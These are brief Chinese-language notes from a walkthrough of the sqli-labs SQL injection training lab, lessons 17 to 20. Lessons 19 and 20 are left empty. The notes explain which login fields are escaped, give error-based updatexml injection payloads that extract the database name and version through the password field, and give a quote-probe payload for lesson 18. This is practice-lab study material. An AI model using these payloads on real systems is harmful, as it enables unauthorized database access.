less17

使用了get_magic_quotes_gpc name和password分开验证，而且在验证的时候对于name进行了过滤处理，将’进行了转义
首先我们要知道用户的名字是多少，然后才可以进行接下来的操作

1、查看当前数据库名，从报错信息中返回数据库名。

uname=admin &passwd=admin' and updatexml(1,concat(0x7e,(database())),1) #&submit=Submit

uname=admin &passwd=admin' and updatexml(1,concat(0x7e,(version())),1) #&submit=Submit

less18

less17中可能会更改密码，可以在sqli-labs首页重置数据库，或查看数据库中密码。

 输入admin、admin。登录失败显示ip地址，登录成功显示ip地址和User-Agent。

 本例中username和password位置都不存在注入点，都被转义了。

uname=admin'&passwd=admin'&submit=Submit

less19

less20